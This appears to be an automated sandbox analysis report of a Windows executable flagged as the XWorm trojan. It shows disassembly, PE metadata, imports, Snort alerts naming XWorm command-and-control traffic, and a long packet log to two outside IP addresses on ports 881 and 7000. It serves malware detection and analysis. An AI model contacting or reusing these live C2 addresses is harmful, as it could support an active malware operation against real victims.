jne 00007F48F47D5AA9h
push eax
call 00007F48F47D438Fh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F48F47D5B05h
call 00007F48F47D96BEh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007F48F47D5AB4h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F48F47D5AA9h
call 00007F48F47DD89Fh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007F48F47D5AB8h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F48F47D5AAAh
call 00007F48F47DD0FEh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F48F47D5AB6h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F48F47D5AACh
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d96c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c6ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	4a4de4552a8a05cfea4c4ff1b4e9532e	False	0.5845901570855615	data	6.644459188479388	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50f0	0x5200	ad68afc2c0ee96c65808794ff63ca57c	False	0.3600895579268293	data	4.931581001835946	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	45f752e15a14fca1b3ff2706b42091af	False	0.3167067307692308	data	3.8749828218454043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c6ec	0x1c800	f7f67e74808bd8e37d727b9023fabdcb	False	0.2743540981359649	data	4.804387241910113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2e	0x2000	fdaa21fac2a6fbee01e606c2b1b84ce7	False	0.4864501953125	data	4.81697133250145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x2a8	data	Chinese	China	0.4602941176470588
RT_MANIFEST	0x3f584	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:25:03.515460	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49705	117.41.184.33	192.168.2.5
07/02/24-19:25:03.516212	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49705	7000	192.168.2.5	117.41.184.33
07/02/24-19:23:08.005869	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49705	7000	192.168.2.5	117.41.184.33
07/02/24-19:21:17.025426	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49705	7000	192.168.2.5	117.41.184.33
07/02/24-19:24:50.403516	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49705	117.41.184.33	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:20:57.498049021 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:57.502979994 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:57.503057957 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:57.503222942 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:57.507975101 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440746069 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440773964 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440783978 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440794945 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440805912 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440818071 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440828085 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440838099 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440886974 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.440896988 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440908909 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.440937996 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.440982103 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.445839882 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.445858002 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.445868969 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.445941925 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.445998907 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678328991 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678378105 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678433895 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678467989 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678491116 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678491116 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678503036 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678550959 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678560019 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678560019 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678587914 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.678627014 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.678627014 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679097891 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679151058 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679229975 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679280996 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679330111 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679332018 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679332018 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679364920 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679398060 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.679404974 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679404974 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.679533958 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680063009 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680114985 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680154085 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680154085 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680162907 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680197001 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680229902 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680234909 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680234909 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680301905 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.680938005 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.680970907 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.681013107 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.681013107 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.681030035 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.681062937 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.681094885 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.681103945 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.681103945 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.681221008 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.683604002 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.683655977 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.683691978 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.683691978 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.915771961 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.915937901 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.915968895 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.915987015 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.915987015 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916002035 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916040897 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916040897 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916054010 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916086912 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916119099 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916124105 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916124105 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916151047 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916182995 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916205883 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916205883 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916215897 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916249990 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916269064 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916269064 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916347980 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916479111 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916565895 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916567087 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916601896 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916634083 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916640043 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916640043 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916667938 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916690111 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916743994 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916824102 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916856050 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916888952 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916893005 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916893005 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916951895 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916954994 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.916985035 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.916996956 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.917016983 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.917038918 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.917067051 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.917085886 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.917100906 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.917140007 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:20:58.917140961 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.917140961 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:20:58.917197943 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:21:02.566456079 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:02.571454048 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:02.571553946 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:02.705553055 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:02.710448980 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:17.025425911 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:17.030723095 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:17.356143951 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:17.411479950 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:17.658963919 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:17.664015055 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:20.418926001 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:20.474294901 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:31.349597931 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:31.354648113 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:31.682374954 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:31.684583902 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:31.690493107 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:45.677848101 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:45.682734013 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:46.006100893 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:46.008666992 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:21:46.013715029 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:50.412409067 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:21:50.458431959 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:00.005672932 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:00.010538101 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:00.331337929 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:00.334053993 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:00.339148998 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:03.918706894 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:22:03.918945074 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:22:14.333827972 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:14.338596106 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:14.552637100 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:14.557991982 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:14.659775019 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:14.663412094 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:14.668452024 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:14.893496990 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:14.895900965 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:14.901901007 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:20.052628994 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:20.057568073 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:20.392930031 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:20.395112991 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:20.400048971 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:20.667813063 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:20.710711956 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:26.726758003 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:26.731664896 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:27.054572105 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:27.060023069 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:27.064829111 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:30.569150925 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:30.574070930 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:30.897625923 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:30.946803093 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:30.983659029 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:30.988519907 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.255665064 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:41.260581017 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.271280050 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:41.276230097 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.584922075 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.586972952 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:41.591831923 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.816247940 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:41.818593979 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:41.823493004 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:42.583761930 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:42.588716984 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:42.910237074 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:42.914635897 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:42.919523954 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:43.365000963 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:43.369940996 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:43.690804005 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:43.693048000 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:43.698199034 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:47.021120071 CEST	49704	881	192.168.2.5	91.208.240.157
Jul 2, 2024 19:22:47.025912046 CEST	881	49704	91.208.240.157	192.168.2.5
Jul 2, 2024 19:22:50.408766031 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:50.458432913 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:52.271284103 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:52.276416063 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:52.605465889 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:52.607635975 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:52.612714052 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:53.100845098 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:53.105858088 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:53.429230928 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:22:53.431669950 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:22:53.436630011 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.646321058 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:02.651181936 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.661919117 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:02.666661978 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.677418947 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:02.682235003 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.739841938 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:02.744626045 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.972453117 CEST	7000	49705	117.41.184.33	192.168.2.5
Jul 2, 2024 19:23:02.974433899 CEST	49705	7000	192.168.2.5	117.41.184.33
Jul 2, 2024 19:23:02.979226112 CEST	7000	49705	117.41.184.33	192.168.2.5
